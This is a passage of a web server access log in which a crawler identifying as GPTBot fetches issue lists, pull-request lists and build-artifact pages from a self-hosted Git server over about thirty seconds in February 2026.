- 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:19:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:19:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr 